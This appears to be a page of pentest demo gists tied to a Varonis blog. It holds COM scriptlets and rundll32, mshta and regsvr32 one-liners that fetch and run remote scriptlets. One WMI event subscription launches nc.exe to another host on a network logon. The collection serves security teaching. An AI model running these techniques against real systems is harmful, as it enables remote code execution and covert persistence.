This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE | |
Version 2, December 2004 | |
Copyright (C) 2011 YOUR_NAME_HERE <YOUR_URL_HERE> | |
Everyone is permitted to copy and distribute verbatim or modified | |
copies of this license document, and changing it is allowed as long | |
as the name is changed. | |
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
write-host "Watching GIF animations showing JavaScript malware launched from an ADS" | |
start-sleep -seconds 2 | |
write-host "can be strangely compelling." | |
write-host -seconds 4 | |
write-host "You'll want to watch this video over and over " | |
start-sleep -seconds 4 | |
write-host "and over. And now you have an uncontrollabe urge to click the CTA." | |
start-sleep -seconds 3 | |
write-host "The one that says Free Varonis Demo!" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
write-host "Watching GIF animations showing JavaScript malware launched from an ADS" | |
start-sleep -seconds 4 | |
write-host "can be strangely compelling." | |
start-sleep -seconds 4 | |
write-host "You'll want to watch this video over and over " | |
start-sleep -seconds 5 | |
write-host "and over. And now you have an uncontrollabe urge to click the CTA." | |
start-sleep -seconds 3 | |
write-host "The one that says Free Varonis Demo!" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="Pentest" | |
classid="{10001111-0000-0000-0000-0000FEEDACDC}" > | |
<script language="JScript"> | |
![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | |
]]> | |
</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> | |
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --> | |
<scriptlet> | |
<public> | |
</public> | |
<script language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("powershell -noe -nop write-host"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> | |
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --> | |
<scriptlet> | |
<public> | |
</public> | |
<script language="JScript"> | |
<![CDATA[ | |
window.alert("hello"); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> | |
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --> | |
<scriptlet> | |
<public> | |
</public> | |
<script language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("powershell -noe write-host Booo!"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="TESTING" | |
classid="{A1112221-0000-0000-3000-000DA00DABFC}" > | |
<script language="JScript"> | |
<![CDATA[ | |
var foo = new ActiveXObject("WScript.Shell").Run("echo If you see this message, you need to review your security. See blog.varonis.com for answers"); | |
]]> | |
</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
regsvr32 /s /n /u /i:https://gist.githubusercontent.com/agreenjay/c6cc5066b453b909f5ae0542504c1b6e/raw/c58b9f4fe3ac5251630a2948222cd8909e6ce1dc/scripty2.sct |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process;$users=@(); foreach ($n in $names){ $users += $n.GetOwner().User};foreach ($user in $users){if ($user -eq 'cruella') { C:\Users\lex\Documents\nc.exe 172.31.18.92 10000 }}} |
OlderNewer